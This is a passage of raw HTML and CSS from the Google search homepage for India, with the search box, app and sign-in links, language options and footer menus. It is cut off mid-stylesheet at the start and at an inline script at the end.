rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);height:14px;margin:2px;position:absolute;right:0;width:14px}.gb_Da{color:#1f71e7;font:400 22px/32px Google Sans,Roboto,RobotoDraft,Helvetica,Arial,sans-serif;text-align:center;text-transform:uppercase}@media (min-resolution:1.25dppx),(-o-min-device-pixel-ratio:5/4),(-webkit-min-device-pixel-ratio:1.25),(min-device-pixel-ratio:1.25){.gb_Aa::before{display:inline-block;-moz-transform:scale(.5);transform:scale(.5);-moz-transform-origin:left 0;transform-origin:left 0}.gb_Ea::before{display:inline-block;-moz-transform:scale(.5);transform:scale(.5);-moz-transform-origin:left 0;transform-origin:left 0}.gb_i .gb_Ea::before{-moz-transform:scale(0.416666667);transform:scale(0.416666667)}}.gb_Aa:hover,.gb_Aa:focus{-moz-box-shadow:0 1px 0 rgba(0,0,0,.15);box-shadow:0 1px 0 rgba(0,0,0,.15)}.gb_Aa:active{-moz-box-shadow:inset 0 2px 0 rgba(0,0,0,.15);box-shadow:inset 0 2px 0 rgba(0,0,0,.15)}.gb_Aa:active::after{background:rgba(0,0,0,.1);-moz-border-radius:50%;border-radius:50%;content:'';display:block;height:100%}.gb_Fa{cursor:pointer;line-height:40px;min-width:30px;opacity:.75;overflow:hidden;vertical-align:middle;text-overflow:ellipsis}.gb_A.gb_Fa{width:auto}.gb_Fa:hover,.gb_Fa:focus{opacity:.85}.gb_Ha .gb_Fa,.gb_Ha .gb_Ia{line-height:26px}#gb#gb.gb_Ha a.gb_Fa,.gb_Ha .gb_Ia{font-size:11px;height:auto}.gb_Ja{border-top:4px solid #000;border-left:4px dashed transparent;border-right:4px dashed transparent;display:inline-block;margin-left:6px;opacity:.75;vertical-align:middle}.gb_Ka:hover .gb_Ja{opacity:.85}.gb_ga>.gb_La{padding:3px 3px 3px 4px}.gb_Ma.gb_za{color:#fff}.gb_Aa.gb_Na{clip-path:path('M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z')}.gb_Oa{-moz-border-radius:50%;border-radius:50%;-moz-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Pa{fill:#d93025}.gb_Qa{fill:white}.gb_ha .gb_Pa{fill:#f28b82}.gb_ha .gb_Qa{fill:#202124}.gb_Ra{-moz-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0px;width:18px}.gb_g .gb_Fa,.gb_g .gb_Ja{opacity:1}#gb#gb.gb_g.gb_g a.gb_Fa,#gb#gb .gb_g.gb_g a.gb_Fa{color:#fff}.gb_g.gb_g .gb_Ja{border-top-color:#fff;opacity:1}.gb_B .gb_Aa:hover,.gb_g .gb_Aa:hover,.gb_B .gb_Aa:focus,.gb_g .gb_Aa:focus{-moz-box-shadow:0 1px 0 rgba(0,0,0,.15),0 1px 2px rgba(0,0,0,.2);box-shadow:0 1px 0 rgba(0,0,0,.15),0 1px 2px rgba(0,0,0,.2)}.gb_Sa .gb_La,.gb_Ta .gb_La{position:absolute;right:1px}.gb_La.gb_f,.gb_Ua.gb_f,.gb_Ka.gb_f{flex:0 1 auto;flex:0 1 main-size}.gb_Va.gb_Wa .gb_Fa{width:30px!important}.gb_Xa{height:40px;position:absolute;right:-5px;top:-5px;width:40px}.gb_Za .gb_Xa,.gb_0a .gb_Xa{right:0;top:0}.gb_La .gb_A{padding:4px}.gb_9d{display:none}sentinel{}.z1asCe{display:inline-block;fill:currentColor;height:24px;line-height:24px;position:relative;width:24px}.z1asCe svg{display:block;height:100%;width:100%}</style></head><body jsmodel="hspDDf"><style>.L3eUgb{display:flex;flex-direction:column;height:100%}.o3j99{flex-shrink:0;box-sizing:border-box}.n1xJcf{height:60px}.LLD4me{min-height:150px;max-height:290px;height:calc(100% - 560px)}.yr19Zb{min-height:92px}.ikrT4e{max-height:160px}.qarstb{flex-grow:1}</style><div class="L3eUgb" data-hveid="1"><div class="o3j99 n1xJcf Ne6nSd"><style>.Ne6nSd{display:flex;align-items:center;padding:6px}.LX3sZb{display:inline-block;flex-grow:1}</style><div class="LX3sZb"><div class="gb_na gb_Vd gb_Za" id="gb"><div class="gb_Td gb_Va gb_Id" data-ogsr-up=""><div><div class="gb_5d gb_f gb_jg gb_ag" data-ogbl=""><div class="gb_e gb_f"><a class="gb_d" data-pid="23" href="https://mail.google.com/mail/&ogbl" target="_top">Gmail</a></div><div class="gb_e gb_f"><a class="gb_d" data-pid="2" href="https://www.google.co.in/imghp?hl=en&ogbl" target="_top">Images</a></div></div></div><div class="gb_Pe"><div class="gb_Qc"><div class="gb_z gb_ed gb_f gb_xf" data-ogsr-fb="true" data-ogsr-alt="" id="gbwa"><div class="gb_wf"><a class="gb_A" aria-label="Google apps" href="https://www.google.co.in/intl/en/about/products" aria-expanded="false" role="button" tabindex="0"><svg class="gb_Se" focusable="false" viewbox="0 0 24 24"><path d="M6,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2z"></path></svg></a></div></div></div><a class="gb_1 gb_2 gb_6d gb_6c" href="https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com/%3Fgws_rd%3Dssl&ec=GAZAmgQ" target="_top">Sign in</a></div></div></div></div></div><div class="o3j99 LLD4me yr19Zb LS8OJ"><style>.LS8OJ{display:flex;flex-direction:column;align-items:center}.k1zIA{height:100%;margin-top:auto}</style><div class="k1zIA rSk4se"><style>.rSk4se{max-height:92px;position:relative}.lnXdpd{max-height:100%;max-width:100%;object-fit:contain;object-position:center bottom;width:auto}</style><img class="lnXdpd" alt="Google" height="92" src="/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png" srcset="/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png 1x, /images/branding/googlelogo/2x/googlelogo_color_272x92dp.png 2x" width="272"></div></div><div class="o3j99 ikrT4e om7nvf"><style>.om7nvf{padding:20px}</style><form action="/search" method="GET" role="search"> <div jsmodel=" vWNDde " jsdata="MuIEvd;_;CcBzaE"> <div jscontroller="cnjECf" jsmodel="QubRsd " class="A8SBwf" jsdata="LVplcb;_;" jsaction="lX6RWd:w3Wsmc;DkpM0b:d3sQLd;IQOavd:dFyQEf;XzZZPe:jI3wzf;Aghsf:AVsnlb;iHd9U:Q7Cnrc;f5hEHe:G0jgYd;vmxUb:j3bJnb;R2c5O:LuRugf;qiCkJd:ANdidc;NOg9L:HLgh3;uGoIkd:epUokb;zLdLw:eaGBS;rcuQ6b:npT2md"><style>.A8SBwf{margin:0 auto;width:640px;padding-top:6px;width:auto;max-width:584px;position:relative;}.RNNXgb{display:flex;z-index:3;height:44px;background:#fff;border:1px solid #dfe1e5;box-shadow:none;border-radius:24px;margin:0 auto;width:638px;width:auto;max-width:584px;}.minidiv .RNNXgb{height:32px;border-radius:16px;margin:10px 0 0;background:#fff;}.emcav .RNNXgb{border-bottom-left-radius:0;border-bottom-right-radius:0;box-shadow:0 1px 6px rgba(32,33,36,.28);border-color:rgba(223,225,229,0);}.minidiv .emcav .RNNXgb{border-bottom-left-radius:0;border-bottom-right-radius:0;}.emcav.emcat .RNNXgb{border-bottom-left-radius:24px;border-bottom-right-radius:24px}.minidiv .emcav.emcat .RNNXgb{border-bottom-left-radius:16px;border-bottom-right-radius:16px}.RNNXgb:hover,.sbfc .RNNXgb{background-color:#fff;box-shadow:0 1px 6px rgba(32,33,36,.28);border-color:rgba(223,225,229,0)}.SDkEP{flex:1;display:flex;padding:5px 8px 0 14px;}.minidiv .SDkEP{padding-top:0}.FPdoLc{padding-top:18px}.iblpc{display:flex;align-items:center;padding-right:13px;margin-top:-5px}.minidiv .iblpc{margin-top:0}</style><style>.CKb9sd{background:none;display:flex;flex:0 0 auto}</style><div class="RNNXgb" jsname="RNNXgb"><div class="SDkEP"><div class="iblpc" jsname="uFMOof"><style>.CcAdNb{margin:auto}.QCzoEc{margin-top:3px;color:#9aa0a6;height:20px;width:20px}</style><div class="CcAdNb"><span class="QCzoEc z1asCe MZy1Rb"><svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27A6.471 6.471 0 0 0 16 9.5 6.5 6.5 0 1 0 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"></path></svg></span></div></div><div jscontroller="vZr2rb" class="a4bIc" jsname="gLFyf" jsaction="h5M12e;input:d3sQLd;blur:jI3wzf"><style>.gLFyf{background-color:transparent;border:none;margin:0;padding:0;color:rgba(0,0,0,.87);word-wrap:break-word;outline:none;display:flex;flex:100%;tap-highlight-color:transparent;margin-top:-37px;height:34px;font-size:16px;}.minidiv .gLFyf{margin-top:-35px;}.a4bIc{display:flex;flex:1;flex-wrap:wrap}.YacQv{color:transparent;flex:100%;white-space:pre;height:34px;font-size:16px;}.YacQv span{background:url("/images/experiments/wavy-underline.png") repeat-x scroll 0 100% transparent;padding:0 0 10px 0;}</style><div class="YacQv gsfi" jsname="vdLsw"></div><input class="gLFyf gsfi" jsaction="paste:puy29d;" maxlength="2048" name="q" type="text" aria-autocomplete="both" aria-haspopup="false" autocapitalize="off" autocomplete="off" autocorrect="off" autofocus="" role="combobox" spellcheck="false" title="Search" value="" aria-label="Search" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q39UDCAQ"></div><div class="dRYYxd"><style>.dRYYxd{display:flex;flex:0 0 auto;margin-top:-5px;align-items:stretch;flex-direction:row}.minidiv .dRYYxd{margin-top:0}</style> <style>.BKRPef{flex:1 0 auto;display:none;cursor:pointer;align-items:center;border:0;background:transparent;outline:none;padding:0 8px;line-height:44px}.M2vV3{display:flex}.ExCKkf{height:100%;color:#70757a;vertical-align:middle;outline:none}.minidiv .BKRPef{line-height:32px}.minidiv .ExCKkf{width:20px}</style> <div jscontroller="PymCCe" class="BKRPef" jsname="RP0xob" aria-label="Clear" role="button" jsaction="AVsnlb;rcuQ6b:npT2md" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q05YFCAU"> <span class="ExCKkf z1asCe rzyADb" jsname="itVqKe" role="button" tabindex="0"><svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41L17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"></path></svg></span> </div> </div></div></div><div jscontroller="Dvn7fe" class="UUbT9" style="display:none" jsname="UUbT9" jsaction="mouseout:ItzDCd;mouseleave:MWfikb;hBEIVb:nUZ9le;YMFC3:VKssTb;vklu5c:k02QY;mMf61e:Mb6Xlc"><style>.UUbT9{position:absolute;text-align:left;z-index:3;cursor:default;user-select:none;width:100%;margin-top:-1px;}.aajZCb{display:flex;flex-direction:column;list-style-type:none;margin:0;padding:0;overflow:hidden;background:#fff;border-radius:0 0 24px 24px;box-shadow:0 4px 6px rgba(32,33,36,.28);border:0;padding-bottom:4px;}.minidiv .aajZCb{border-bottom-left-radius:16px;border-bottom-right-radius:16px}.erkvQe{padding-bottom:8px;flex:auto;}.RjPuVb{height:1px;margin:0 26px 0 0;}.S3nFnd{display:flex}.S3nFnd .RjPuVb,.S3nFnd .aajZCb{flex:0 0 auto}.lh87ke:link,.lh87ke:visited{color:#1a0dab;cursor:pointer;font:11px arial,sans-serif;padding:0 5px;margin-top:-10px;text-decoration:none;flex:auto;align-self:flex-end;margin:0 16px 5px 0}.lh87ke:hover{text-decoration:underline}.xtSCL{border-top:1px solid #e8eaed;margin:0 20px 0 14px;padding-bottom:4px}.sb7{background:url() no-repeat ;min-height:0px;min-width:0px;height:0px;width:0px}.sb27{background:url(/images/searchbox/desktop_searchbox_sprites318_hr.webp) no-repeat 0 -21px;background-size:20px;min-height:20px;min-width:20px;height:20px;width:20px}.sb43{background:url(/images/searchbox/desktop_searchbox_sprites318_hr.webp) no-repeat 0 0;background-size:20px;min-height:20px;min-width:20px;height:20px;width:20px}.sb53.sb53{padding:0 4px;margin:0}.sb33{background:url(/images/searchbox/desktop_searchbox_sprites318_hr.webp) no-repeat 0 -42px;background-size:20px;height:20px;width:20px;}</style><div class="RjPuVb" jsname="RjPuVb"></div><div class="aajZCb" jsname="aajZCb"><div class="xtSCL"></div><ul class="erkvQe" jsname="erkvQe" role="listbox"></ul><style>#shJ2Vb{display:none}.OBMEnb{padding:0;margin:0}.G43f7e{display:flex;flex-direction:column;min-width:0;padding:0}.Ye4jfc{flex-direction:row;flex-wrap:wrap}</style><div jsname="E80e9e" class="OBMEnb" id="shJ2Vb" role="presentation"><ul jsname="bw4e9b" class="G43f7e" role="listbox"></ul></div><style>#ynRric{display:none}.ynRric{list-style-type:none;flex-direction:column;color:#70757a;font-family:Google Sans,arial,sans-serif-medium,sans-serif;font-size:14px;margin:0 20px 0 16px;padding:8px 0 8px 0;line-height:16px;width:100%}</style><div class="ynRric" id="ynRric" role="presentation"></div><style>#YMXe{display:none}.sbct{display:flex;align-items:center;min-width:0;padding:0;}.eIPGRd{flex:auto;display:flex;align-items:center;margin:0 20px 0 14px}.pcTkSc{display:flex;flex:auto;flex-direction:column;min-width:0;padding:6px 0}.sbic{display:flex;align-items:center;margin:0 13px 0 1px;}.sbic.vYOkbe{background:center/contain no-repeat;border-radius:4px;min-height:32px;min-width:32px;margin:4px 7px 4px -5px;}.sbre .wM6W7d{line-height:18px}.ClJ9Yb{line-height:12px;font-size:13px;color:#80868b;margin-top:2px}.wM6W7d{display:flex;font-size:16px;color:#212121;flex:auto;align-items:center;word-break:break-all;padding-right:8px}.minidiv .wM6W7d{font-size:14px}.WggQGd{color:#52188c}.wM6W7d span{flex:auto}.AQZ9Vd{display:flex;align-self:stretch;}.JCHpcb:hover{color:#1a73e8;text-decoration:underline;}.JCHpcb{color:#80868b;font:13px arial,sans-serif;cursor:pointer;align-self:center}.sbhl{background:#eee;}.mus_pc{display:block;margin:6px 0}.mus_il{font-family:Arial,HelveticaNeue-Light,HelveticaNeue,Helvetica;padding-top:7px;position:relative}.mus_il:first-child{padding-top:0}.mus_il_at{margin-left:10px}.mus_il_st{right:52px;position:absolute}.mus_il_i{align:left;margin-right:10px}.mus_it3{margin-bottom:3px;max-height:24px;vertical-align:bottom}.mus_it5{height:24px;width:24px;vertical-align:bottom;margin-left:10px;margin-right:10px;transform:rotate(90deg)}.mus_tt3{color:#767676;font-size:12px;vertical-align:top}.mus_tt5{color:#d93025;font-size:14px}.mus_tt6{color:#188038;font-size:14px}.mus_tt8{font-size:16px;font-family:Arial,sans-serif}.mus_tt17{color:#212121;font-size:20px}.mus_tt18{color:#212121;font-size:24px}.mus_tt19{color:#767676;font-size:12px}.mus_tt20{color:#767676;font-size:14px}.mus_tt23{color:#767676;font-size:18px}</style><li data-view-type="1" class="sbct" id="YMXe" role="presentation"><div class="eIPGRd"><div class="sbic"></div><div class="pcTkSc" role="option"><div class="wM6W7d"><span></span></div><div class="ClJ9Yb"><span></span></div></div><div class="AQZ9Vd"><div class="sbai">Remove</div></div></div></li><div class="CqAVzb lJ9FBc" jsname="VlcLAe"> <style>.lJ9FBc{height:70px}.lJ9FBc input[type="submit"],.gbqfba{background-color:#f8f9fa;border:1px solid #f8f9fa;border-radius:4px;color:#3c4043;font-family:arial,sans-serif;font-size:14px;margin:11px 4px;padding:0 16px;line-height:27px;height:36px;min-width:54px;text-align:center;cursor:pointer;user-select:none}.lJ9FBc input[type="submit"]:hover{box-shadow:0 1px 1px rgba(0,0,0,.1);background-color:#f8f9fa;border:1px solid #dadce0;color:#202124}.lJ9FBc input[type="submit"]:focus{border:1px solid #4285f4;outline:none}input:focus{outline:none}input::-moz-focus-inner{border:0}</style> <center> <input class="gNO89b" value="Google Search" aria-label="Google Search" name="btnK" role="button" tabindex="0" type="submit" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q4dUDCAY"> <input class="RNmpXc" value="I'm Feeling Lucky" aria-label="I'm Feeling Lucky" name="btnI" type="submit" jsaction="trigger.kWlxhc" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q19QECAc"> </center> </div></div><style>.MG7lrf{font-size:8pt;margin-top:-16px;position:absolute;right:16px}</style><div jsname="JUypV" jscontroller="OqGDve" class="MG7lrf" data-async-context="async_id:duf3-46;authority:0;card_id:;entry_point:0;feature_id:;ftoe:0;header:0;is_jobs_spam_form:0;open:0;preselect_answer_index:-1;suggestions:;suggestions_subtypes:;suggestions_types:;surface:0;title:;type:46"><style>a.oBa0Fe{color:#70757a;float:right;font-style:italic;tap-highlight-color:rgba(0,0,0,.00);tap-highlight-color:rgba(0,0,0,.00)}a.aciXEb{padding:0 5px;}.RTZ84b{color:#70757a;cursor:pointer;padding-right:8px}.XEKxtf{color:#70757a;float:right;font-size:12px;line-height:16px;padding-bottom:4px}</style><div jscontroller="EkevXb" style="display:none" jsaction="rcuQ6b:npT2md"></div><div id="duf3-46" data-jiis="up" data-async-type="duffy3" data-async-context-required="type,open,feature_id,async_id,entry_point,authority,card_id,ftoe,title,header,suggestions,surface,suggestions_types,suggestions_subtypes,preselect_answer_index,is_jobs_spam_form" class="yp" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q-0EICA"></div><a class="oBa0Fe aciXEb" href="#" id="sbfblt" data-async-trigger="duf3-46" role="button" jsaction="trigger.szjOR" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Qtw8ICQ">Report inappropriate predictions</a></div></div><div class="FPdoLc lJ9FBc"> <center> <input class="gNO89b" value="Google Search" aria-label="Google Search" name="btnK" role="button" tabindex="0" type="submit" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q4dUDCAo"> <input class="RNmpXc" value="I'm Feeling Lucky" aria-label="I'm Feeling Lucky" name="btnI" type="submit" jsaction="trigger.kWlxhc" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q19QECAs"> </center> </div></div> <div style="background:url(/images/searchbox/desktop_searchbox_sprites318_hr.webp)"> </div> </div> <div id="tophf"><input name="source" type="hidden" value="hp"><input value="uPQuYr-_B-yD1e8PwcG16Ag" name="ei" type="hidden"><input value="AHkkrS4AAAAAYi8CyAiUnB-FFeaR9OR7UtGFcONeuExo" name="iflsig" type="hidden"></div></form></div><div class="o3j99 qarstb"><style>.vcVZ7d{text-align:center}</style><div class="vcVZ7d" id="gws-output-pages-elements-homepage_additional_languages__als"><style>#gws-output-pages-elements-homepage_additional_languages__als{font-size:small;margin-bottom:24px}#SIvCob{color:#3c4043;display:inline-block;line-height:28px;}#SIvCob a{padding:0 3px;}.H6sW5{display:inline-block;margin:0 2px;white-space:nowrap}.z4hgWe{display:inline-block;margin:0 2px}</style><div id="SIvCob">Google offered in: <a href="https://www.google.com/setprefs?sig=0_fGUlsRFLGDHbU210iwfljTf4UZI%3D&hl=hi&source=homepage&sa=X&ved=0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q2ZgBCA0">हिन्दी</a> <a href="https://www.google.com/setprefs?sig=0_fGUlsRFLGDHbU210iwfljTf4UZI%3D&hl=bn&source=homepage&sa=X&ved=0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q2ZgBCA4">বাংলা</a> <a href="https://www.google.com/setprefs?sig=0_fGUlsRFLGDHbU210iwfljTf4UZI%3D&hl=te&source=homepage&sa=X&ved=0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q2ZgBCA8">తెలుగు</a> <a href="https://www.google.com/setprefs?sig=0_fGUlsRFLGDHbU210iwfljTf4UZI%3D&hl=mr&source=homepage&sa=X&ved=0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q2ZgBCBA">मराठी</a> <a href="https://www.google.com/setprefs?sig=0_fGUlsRFLGDHbU210iwfljTf4UZI%3D&hl=ta&source=homepage&sa=X&ved=0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q2ZgBCBE">தமிழ்</a> <a href="https://www.google.com/setprefs?sig=0_fGUlsRFLGDHbU210iwfljTf4UZI%3D&hl=gu&source=homepage&sa=X&ved=0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q2ZgBCBI">ગુજરાતી</a> <a href="https://www.google.com/setprefs?sig=0_fGUlsRFLGDHbU210iwfljTf4UZI%3D&hl=kn&source=homepage&sa=X&ved=0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q2ZgBCBM">ಕನ್ನಡ</a> <a href="https://www.google.com/setprefs?sig=0_fGUlsRFLGDHbU210iwfljTf4UZI%3D&hl=ml&source=homepage&sa=X&ved=0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q2ZgBCBQ">മലയാളം</a> <a href="https://www.google.com/setprefs?sig=0_fGUlsRFLGDHbU210iwfljTf4UZI%3D&hl=pa&source=homepage&sa=X&ved=0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q2ZgBCBU">ਪੰਜਾਬੀ</a> </div></div></div><div class="o3j99 c93Gbe"><style>.c93Gbe{background:#f2f2f2}.uU7dJb{padding:15px 30px;border-bottom:1px solid #dadce0;font-size:15px;color:#70757a}.SSwjIe{padding:0 20px}.KxwPGc{display:flex;flex-wrap:wrap;justify-content:space-between}@media only screen and (max-width:1200px){.KxwPGc{justify-content:space-evenly}}.pHiOh{display:block;padding:15px;white-space:nowrap}a.pHiOh{color:#70757a}</style><div class="uU7dJb">India</div><div jscontroller="NzU6V" class="KxwPGc SSwjIe" data-sfe="false" data-sfsw="1200" jsaction="rcuQ6b:npT2md"><div class="KxwPGc AghGtd"><a class="pHiOh" href="https://about.google/?utm_source=google-IN&utm_medium=referral&utm_campaign=hp-footer&fg=1" data-jsarwt="1" data-usg="AOvVaw33zjaJZ_ogw8iPEm4kPGYh" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0QkNQCCBY">About</a><a class="pHiOh" href="https://www.google.com/intl/en_in/ads/?subid=ww-ww-et-g-awa-a-g_hpafoot1_1!o2&utm_source=google.com&utm_medium=referral&utm_campaign=google_hpafooter&fg=1" data-jsarwt="1" data-usg="AOvVaw3Oj62V1xNd5oAI6Vxou5Lx" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0QkdQCCBc">Advertising</a><a class="pHiOh" href="https://www.google.com/services/?subid=ww-ww-et-g-awa-a-g_hpbfoot1_1!o2&utm_source=google.com&utm_medium=referral&utm_campaign=google_hpbfooter&fg=1" data-jsarwt="1" data-usg="AOvVaw2SJ4zwRVXKyZr53qG9dm4K" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0QktQCCBg">Business</a><a class="pHiOh" href="https://google.com/search/howsearchworks/?fg=1"> How Search works </a></div><div class="KxwPGc iTjxkf"><a class="pHiOh" href="https://policies.google.com/privacy?hl=en-IN&fg=1" data-jsarwt="1" data-usg="AOvVaw2y-DJehqHRQuhUzwsARmol" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q8awCCBk">Privacy</a><a class="pHiOh" href="https://policies.google.com/terms?hl=en-IN&fg=1" data-jsarwt="1" data-usg="AOvVaw25sheD5OGrPUyBw_FdCQOy" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0Q8qwCCBo">Terms</a><div jscontroller="LtQuz" class="ayzqOc"><style>.ayzqOc{position:relative}.EzVRq{display:block;padding:15px;white-space:nowrap}a.EzVRq,button.EzVRq{color:#70757a}button.EzVRq{cursor:pointer;width:100%;text-align:left}button.EzVRq:hover,button.EzVRq:active{text-decoration:underline}.Qff0zd{display:none;position:absolute;list-style:none;background:#fff;border:1px solid #70757a}</style><style>.Qff0zd{min-width:200px}.mRoO9c{display:block;border-top:1px solid #ebebeb}.pENqnf{color:#70757a;cursor:pointer;padding-bottom:10px;padding-top:10px}</style><button jsname="pzCKEc" class="EzVRq" aria-controls="dEjpnf" aria-haspopup="true" id="Mses6b" jsaction="mousedown:lgs1Pb;FwYIgd;keydown:QXPedb">Settings</button><ul jsname="xl07Ob" class="Qff0zd" aria-labelledby="Mses6b" id="dEjpnf" role="menu" jsaction="keydown:OEXC3c;focusout:Y48pVb"><li role="none"><a class="EzVRq" href="https://www.google.com/preferences?hl=en-IN&fg=1" role="menuitem" tabindex="-1">Search settings</a></li><li role="none"><a class="EzVRq" href="/advanced_search?hl=en-IN&fg=1" role="menuitem" tabindex="-1">Advanced search</a></li><li role="none"><a class="EzVRq" href="/history/privacyadvisor/search/unauth?utm_source=googlemenu&fg=1" role="menuitem" tabindex="-1">Your data in Search</a></li><li role="none"><a class="EzVRq" href="/history/optout?hl=en-IN&fg=1" role="menuitem" tabindex="-1">Search history</a></li><li role="none"><a class="EzVRq" href="https://support.google.com/websearch/?p=ws_results_help&hl=en-IN&fg=1" role="menuitem" tabindex="-1">Search help</a></li><li role="none"><button class="EzVRq" data-bucket="websearch" role="menuitem" tabindex="-1" jsaction="trigger.YcfJ">Send feedback</button></li><li class="mRoO9c" role="separator"></li><li role="none"><div class="EzVRq pENqnf" data-spl="/setprefs?hl=en&prev=https://www.google.com/?gws_rd%3Dssl%26pccc%3D1&sig=0_fGUlsRFLGDHbU210iwfljTf4UZI%3D&cs=2" id="YUIDDb" role="menuitem" tabindex="-1"><style>.tFYjZe{align-items:center;display:flex;justify-content:space-between;padding-bottom:4px;padding-top:4px}.tFYjZe:hover .iOHNLb,.tFYjZe:focus .iOHNLb{opacity:1}.iOHNLb{color:#70757a;height:20px;margin-top:-2px;opacity:0;width:20px}</style><div jscontroller="fXO0xe" class="tFYjZe" data-bsdm="0" data-btf="0" data-hbc="#1a73e8" data-htc="#fff" data-spt="1" data-tsdm="0" role="link" tabindex="0" jsaction="ok5gFc;x6BCfb:ggFCce;w3Ukrf:aelxJb" data-ved="0ahUKEwi_-_nsj8X2AhXsQfUHHcFgDY0QqsEHCBs"><div>Dark theme: Off</div><div class="iOHNLb"><span style="height:20px;line-height:20px;width:20px" class="z1asCe aqvxcd"><svg focusable="false" xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 24 24" height="24" viewBox="0 0 24 24" width="24"><rect fill="none" height="24" width="24"></rect><path d="M12,7c-2.76,0-5,2.24-5,5s2.24,5,5,5s5-2.24,5-5S14.76,7,12,7L12,7z M2,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0 c-0.55,0-1,0.45-1,1S1.45,13,2,13z M20,13l2,0c0.55,0,1-0.45,1-1s-0.45-1-1-1l-2,0c-0.55,0-1,0.45-1,1S19.45,13,20,13z M11,2v2 c0,0.55,0.45,1,1,1s1-0.45,1-1V2c0-0.55-0.45-1-1-1S11,1.45,11,2z M11,20v2c0,0.55,0.45,1,1,1s1-0.45,1-1v-2c0-0.55-0.45-1-1-1 C11.45,19,11,19.45,11,20z M5.99,4.58c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41l1.06,1.06 c0.39,0.39,1.03,0.39,1.41,0s0.39-1.03,0-1.41L5.99,4.58z M18.36,16.95c-0.39-0.39-1.03-0.39-1.41,0c-0.39,0.39-0.39,1.03,0,1.41 l1.06,1.06c0.39,0.39,1.03,0.39,1.41,0c0.39-0.39,0.39-1.03,0-1.41L18.36,16.95z M19.42,5.99c0.39-0.39,0.39-1.03,0-1.41 c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L19.42,5.99z M7.05,18.36 c0.39-0.39,0.39-1.03,0-1.41c-0.39-0.39-1.03-0.39-1.41,0l-1.06,1.06c-0.39,0.39-0.39,1.03,0,1.41s1.03,0.39,1.41,0L7.05,18.36z"></path></svg></span></div></div></div></li></ul></div></div></div><div jscontroller="GU4Gab" style="display:none" data-pcs="0" jsaction="rcuQ6b:npT2md"></div></div></div><div class="Fgvgjc"><style>.Fgvgjc{height:0;overflow:hidden}</style><div class="gTMtLb fp-nh" id="lb"><style>.gTMtLb{z-index:1001;position:absolute;top:-1000px}</style></div><span style="display:none"><span jscontroller="DhPYme" style="display:none" data-du="1" jsaction="rcuQ6b:npT2md"></span></span><script nonce="5ySziL3YJHRCAmDtf1BIGA==">this.gbar_=this.gbar_||{};(function(_){var window=this; 